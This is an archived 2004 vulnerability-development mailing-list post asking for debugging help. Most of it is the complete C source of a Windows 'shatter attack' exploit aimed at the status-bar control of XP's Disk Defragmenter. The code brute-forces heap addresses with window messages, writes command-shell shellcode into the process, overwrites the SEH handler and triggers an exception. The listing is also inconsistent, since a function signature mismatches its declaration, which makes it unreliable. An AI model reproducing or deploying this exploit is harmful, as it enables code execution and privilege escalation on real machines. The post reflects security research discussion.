Vulnerability Development: status-bar SHATTER attack

From: bil_912 <bil_912_at_coolgoose.com>
Date: Thu, 8 Jul 2004 03:59:38 +0600

>
>
> hello all,
>
> recently i was playing with >> STATUS-BAR <<
shatter-attack-code provided
> by brett.moore_at_security-assessment.com
>
> the code with tiny modifications is attached here.
>
> the problem is ...
>
> xp.sp1 TOP SEH at 0x77ed73b4 was getting overwritten as 0x77ed74c0 where my

> shellcode is residing.
>
> but even after that the code didnt get executed. i was attacking the
> "disk defragmenter" utility which come with windows XP.
>
> can anyone pls point me where i'm wrong ??
>
> thank u.
>
> [ i'm attaching a screen-shot of my desktop when attacking ]
>
> //=========================================================================
>
/*******************************************************************************
******
> * Statusbar Control Shatter exploit
> *
> * Demonstrates the use of a combination of windows messages to;
> * - brute force a useable heap address
> * - place structure information inside a process
> * - inject shellcode to known location
> * - overwrite 4 bytes of a critical memory address
> *
> * 4 Variables need to be set for proper execution.
> * - tWindow is the title of the programs main window
> * - sehHandler is the critical address to overwrite
> * - shellcodeaddr is the data space to inject the code
> * - heapaddr is the base heap address to start brute forcing
> *
> * Local shellcode is Win2kSp4 ENG Hardcoded because of unicode issues
> * Try it out against any program with a progress bar
> *
>
********************************************************************************
*****/
>
> #include <windows.h>
> #include <commctrl.h>
> #include <stdio.h>
>
> // Local No Null Cmd Shellcode.
> BYTE exploit[]
="\x90\x68\x63\x6d\x64\x00\x54\xb9\xc3\xaf\x01\x78\xff\xd1\xcc";
>
> char g_classNameBuf[ 256 ];
> char tWindow[]="disk defragmenter";
>
> long sehHandler = 0x77ed73b4; // Critical Address To Overwrite
> long shellcodeaddr = 0x77ed74c0; // Known Writeable Space Or Global Space
> unsigned long heapaddr = 0x00100000; // Base Heap Address
> long mainhWnd;
>
> void doWrite(HWND hWnd, long tByte,long address);
> void BruteForceHeap(HWND hWnd);
> void IterateWindows(long hWnd);
>
> int main(int argc, char *argv[])
> {
>
> HMODULE hMod;
> DWORD ProcAddr;
> long x;
>
>
> //making the shellcode ready
> hMod = LoadLibrary("msvcrt.dll");
> ProcAddr = (DWORD)GetProcAddress(hMod, "system");
> if(ProcAddr != 0)
> *(long *)&exploit[8] = ProcAddr;
> //***************************
>
> //printf("+ Enter Window Title\n",tWindow);
> //flushall();
> //gets(tWindow);
>
>
>
> if (argc == 2)
> sscanf(argv[1],"%lx",&heapaddr);// Oddity
>
> printf("%% Using base heap address...0x%xh\n",heapaddr);
> printf("+ Finding %s Window...\n",tWindow);
> mainhWnd = (long)FindWindow(NULL,tWindow);
>
> if(mainhWnd == NULL)
> {
> printf("+ Couldn't Find %s Window\n",tWindow);
> return 0;
> }
> printf("+ Found Main Window At......0x%xh\n",mainhWnd);
> IterateWindows(mainhWnd);
> printf("+ Done...\n");
>
> return 0;
> }
>
>
> void IterateWindows(long hWnd)
> {
>
> long childhWnd,looper;
>
> childhWnd = (long)GetNextWindow((HWND)hWnd,GW_CHILD);
> while (childhWnd != NULL)
> {
> IterateWindows(childhWnd);
> childhWnd = (long)GetNextWindow((HWND)childhWnd ,GW_HWNDNEXT);
> }
>
> GetClassName( (HWND)hWnd, g_classNameBuf, sizeof(g_classNameBuf) );
> if ( strcmp(g_classNameBuf, "msctls_statusbar32") ==0)
> {
>
> // Find Heap Address
> BruteForceHeap((HWND) hWnd);
> //printf("+ Enter heapaddr : \n");
> //scanf("%lx",&heapaddr);
>
> // Inject shellcode to known address
> printf("+ Sending shellcode to......0x%xh\n",shellcodeaddr);
> for (looper=0;looper<sizeof(exploit);looper++)
> doWrite((HWND)hWnd, (long) exploit[looper],(shellcodeaddr + looper));
> // Overwrite SEH
> printf("+ Overwriting Top SEH.......0x%xh\n",sehHandler);
>
>
> doWrite((HWND)hWnd, ((shellcodeaddr) & 0xff),sehHandler);
> doWrite((HWND)hWnd, ((shellcodeaddr >> 8) & 0xff),sehHandler+1);
> doWrite((HWND)hWnd, ((shellcodeaddr >> 16) & 0xff),sehHandler+2);
> doWrite((HWND)hWnd, ((shellcodeaddr >> 24) & 0xff),sehHandler+3);
>
>
>
> // Cause exception
> printf("+ Forcing Unhandled Exception\n");
> getch();
>
> SendMessage((HWND) hWnd,(UINT) PBM_GETRANGE,0,1); //PROGRESSS_BAR
> SendMessage((HWND) hWnd,(UINT) SB_GETPARTS,1,1);
>
> printf("+ Done...\n");
> exit(0);
> }
> }
>
> void BruteForceHeap(HWND hWnd, long tByte,long address)
> {
> long retval;
> BOOL foundHeap = FALSE;
> char buffer[5000];
> memset(buffer,0,sizeof(buffer));
>
> while (!foundHeap)
> {
> printf("+ Trying Heap Address.......0x%xh ",heapaddr);
>
> memset(buffer,0x58,sizeof(buffer)-1); // settin to X
>
> // Set Window Title
> SendMessage( mainhWnd,(UINT) WM_SETTEXT,0,&buffer);
> // Set Part Contents
> SendMessage((HWND) hWnd,(UINT) SB_SETTEXT,0,heapaddr);
> retval=SendMessage((HWND) hWnd,(UINT) SB_GETTEXTLENGTH ,0,0);
> printf("%d",retval);
>
> if(retval == 1)
> {
> // First Retval should be 1
> memset(buffer,0x80,sizeof(buffer)-1);
> // Set Window Title
> SendMessage( mainhWnd,(UINT) WM_SETTEXT,0,&buffer);
> // Set Part Contents
> SendMessage((HWND) hWnd,(UINT) SB_SETTEXT,0,heapaddr);
> retval=SendMessage((HWND) hWnd,(UINT) SB_GETTEXTLENGTH ,0,0);
> if(retval > 1)
> {
> // Second should be larger than 1
> printf(" : %d - Found Heap Address : 0x%x\n",retval,heapaddr);
> return(0);
> }
> }
> printf("\n");
> heapaddr += 2500;
> }
> }
>
>
> void doWrite(HWND hWnd, long tByte,long address)
> {
> char buffer[5000];
>
> memset(buffer,0,sizeof(buffer));
> memset(buffer,tByte,sizeof(buffer)-1);
> // Set Window Title
> SendMessage( mainhWnd,(UINT) WM_SETTEXT,0,&buffer);
>
> // Set Statusbar width
> SendMessage( hWnd,(UINT) SB_SETPARTS,1,heapaddr);
> SendMessage( hWnd,(UINT) SB_GETPARTS,1,address);
>
> }
>
> //=========================================================================
Received on Jul 07 2004